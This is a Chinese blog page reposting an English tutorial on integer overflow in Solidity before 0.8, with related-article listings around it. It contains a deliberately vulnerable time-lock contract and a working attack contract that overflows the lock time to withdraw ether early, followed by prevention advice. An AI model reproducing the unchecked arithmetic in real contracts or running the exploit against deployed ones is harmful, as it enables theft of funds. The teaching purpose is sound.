Arithmetic Overflow and Underflow

最新推荐文章于 2024-08-15 16:41:36 发布
最新推荐文章于 2024-08-15 16:41:36 发布
阅读量317 收藏
点赞数
分类专栏: Hacks 区块链 文章标签: solidity 区块链 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanning1314/article/details/122824059
版权

Vulnerability

Solidity < 0.8

Integers in Solidity overflow / underflow without any errors

Solidity >= 0.8

Default behaviour of Solidity 0.8 for overflow / underflow is to throw an error.

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;

// This contract is designed to act as a time vault.
// User can deposit into this contract but cannot withdraw for atleast a week.
// User can also extend the wait time beyond the 1 week waiting period.

/*
1. Deploy TimeLock
2. Deploy Attack with address of TimeLock
3. Call Attack.attack sending 1 ether. You will immediately be able to
   withdraw your ether.

What happened?
Attack caused the TimeLock.lockTime to overflow and was able to withdraw
before the 1 week waiting period.
*/

contract TimeLock {
    mapping(address => uint) public balances;
    mapping(address => uint) public lockTime;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
        lockTime[msg.sender] = block.timestamp + 1 weeks;
    }

    function increaseLockTime(uint _secondsToIncrease) public {
        lockTime[msg.sender] += _secondsToIncrease;
    }

    function withdraw() public {
        require(balances[msg.sender] > 0, "Insufficient funds");
        require(block.timestamp > lockTime[msg.sender], "Lock time not expired");

        uint amount = balances[msg.sender];
        balances[msg.sender] = 0;

        (bool sent, ) = msg.sender.call{value: amount}("");
        require(sent, "Failed to send Ether");
    }
}

contract Attack {
    TimeLock timeLock;

    constructor(TimeLock _timeLock) {
        timeLock = TimeLock(_timeLock);
    }

    fallback() external payable {}

    function attack() public payable {
        timeLock.deposit{value: msg.value}();
        /*
        if t = current lock time then we need to find x such that
        x + t = 2**256 = 0
        so x = -t
        2**256 = type(uint).max + 1
        so x = type(uint).max + 1 - t
        */
        timeLock.increaseLockTime(
            type(uint).max + 1 - timeLock.lockTime(address(this))
        );
        timeLock.withdraw();
    }
}

Preventative Techniques

  • Use SafeMath to will prevent arithmetic overflow and underflow

  • Solidity 0.8 defaults to throwing an error for overflow / underflow

Try on Remix

yn00
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(含Matlab源码)算术编码(arithmetic coding)的underflow问题
h763247747的博客
11-11 5449
0、文章结构 文章的行文逻辑如下,看官可以根据需要跳读,节省时间。 1、介绍underflowoverflow. 2、underflow问题起源 3、underflow问起探索 4、underflowoverflow的常见情形 5、处理一些溢出问题的小技巧 6、对其中的两种小技巧的优缺点比较   1、什么是underflowoverflow 在计算机中浮点数都是离散的,有...
IDL出现% Program caused arithmetic error: Floating illegal operand 错误!!
环境科学技术研究
07-28 2321
用IDL处理NaN数据时,用到where函数时,经常会出现Program caused arithmetic error: Floating illegal operand 错误,查了下发现官网有说明,记录下防下次出错!!Special Floating-Point Values Machines which implement the IEEE standard for binary float
数值溢出(arithmetic overflow)问题与解决方案
热门推荐
09-03 1万+
1. 求最小公倍数 根据最大公约数求最小公倍数;lcm(a,b)=a⋅bgcd(a,b) \text{lcm}(a,b)=\frac{a\cdot b}{\text{gcd}(a,b)} int gcd(int a, int b); int lcm(int a, int b){ return (a * b)/gcd(a, b); }数学意义上确实没有异议,但在编程实现时,考虑到计算机表示
Overflow and Underflow
weixin_33800593的博客
02-18 186
Overflow is said to occur when the number that one gets as a result of some arithmetic operation on two n-bit binary numbers (signed or unsigned) is larger in magnitude than the largest number one can...
Java java.lang.ArithmeticException: Underflow问题解决
旭东怪的博客
10-07 413
问题描述: java.lang.ArithmeticException: Underflow 问题分析: 1、使用BigDecimal.setScale(int newScale)方法时,newScale参数值小于0,导致报错。 List<Integer> list = new ArrayList<>(); Integer integer = list.stream().collect(Collectors.summarizingInt(x
underflow, overflow, approximation and rounding error
每天进步一点点。
06-11 421
Underflow, overflow, approximation & rounding errorWhat is underflow and what is overflow?Why may a floating-point representation be an approximation?What is rounding error? What is underflow and what is overflow? In computer science, real numbers are
IDL:出现floating overflow
Yangol_Arc的博客
01-17 1587
IDL中出现报错:floating overflow 导致-NAN 原因在于有空值。 修改为: sum=0.0 for i=0,940 do begin for j=0,1183 do begin if img[i,j] gt 0 then begin sum=sum+img[i,j] endif endfor
统计计算①-Floating-point Arithmetic and Stability
鸽饲料的草稿本
09-22 759
实数在计算机中的表示 小数部分(decimal part)可能无限长(infinitely long) Float:Floating-point number 在计算机科学中,浮点(英语:floating point,缩写为FP)是一种对于实数的近似值数值表现法,由一个有效数字(即尾数)加上幂数来表示,通常是乘以某个基数的整数次指数得到。以这种表示法表示的数值,称为浮点数(floating-...
Matlab实现算术编码(arithmetic coding),解决underflow问题
11-11
在“Matlab实现算术编码(arithmetic coding),解决underflow问题”这个主题中,我们将深入探讨算术编码的基本原理、Matlab实现以及如何处理underflow问题。 算术编码的核心思想是将每个可能的符号映射到一个[0, 1...
A Proposal for Hardware Assisted Arithmetic Overflow Detection for Array and Bitfield Operations (LazyOverflowDetect_Final)-计算机科学
04-22
Assisted Arithmetic OverflowDetection for Array and Bitfield OperationsDarek MihockaIntel Corp.Darek.Mihocka@Intel.comJens TroegerIntel Corp.Jens.Troeger@Intel.comAbstractDetecting arithmetic overflow...
计算机算术Computer Arithmetic Algorithms and Hardware Designs-除法部分PPT
04-11
计算机算术是计算科学中的核心领域,涉及到数字的表示、基本运算以及高级算法的设计与实现。在本PPT中,重点讨论的是除法部分,它包括了基础的除法规则和高精度除法器的设计。以下是对这部分内容的详细解析: ...
Computer Arithmetic and Validity - Theory, Implementation, and Applications
01-31
计算机算术和有效性是计算机科学中的基础领域,它涉及整数、实数以及它们的算术运算在计算机系统中的表示、处理和验证。这个领域的研究包括了理论基础、硬件和软件的实现方法以及算术运算在各种应用中的实际使用。...
arithmetic-and-assignment-operator
04-04
在编程语言中,算术运算符和赋值运算符是两个基本的概念,它们在处理数值计算和变量赋值时起到至关重要的作用。...下面我们将详细探讨这两个主题。 算术运算符主要用于执行基本的数学运算,如加法、减法、乘法、除法和...
区块链+金融服务】供应链金融平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 169
四方精创基于 FISCO BCOS 设计了供应链金融平台,利用区块链多中心、不可篡改、不可抵赖、可追溯的特性, 在供应链生态企业间实现信用传递。
Web3入门指南:了解去中心化互联网的基础知识
最新发布
weixin_44672358的博客
08-15 362
Web3作为互联网的未来发展方向,正在引领着数字化时代的新篇章。通过去中心化、智能合约和数字身份技术,Web3不仅提升了互联网的安全性和隐私保护,还为金融、艺术和社交领域带来了新的应用机会。尽管面临技术复杂性、法规监管和网络安全等挑战,Web3技术的发展前景依然广阔。随着技术的不断演进和应用的逐步推广,Web3将为我们创造一个更加开放、公平和安全的数字世界。
区块链+金融服务】企链通金融服务平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 133
深圳市企企通科技积极响应国家政策,为企业引入基于 FISCO BCOS 区块链技术的供应链金融服务。
区块链+金融服务】机构间对账平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 90
机构间对账平台基于 FISCO BCOS 研发,将部分业务的资金信息和交易信息等作为副本旁路上链存储,用于微众银行与合作行的对账工作。
signal SIGFPE, Arithmetic exception
03-31
The signal SIGFPE is a signal that is raised when an arithmetic exception occurs, such as division by zero, overflow, or underflow. When this signal is raised, the program is terminated immediately. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yn00

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值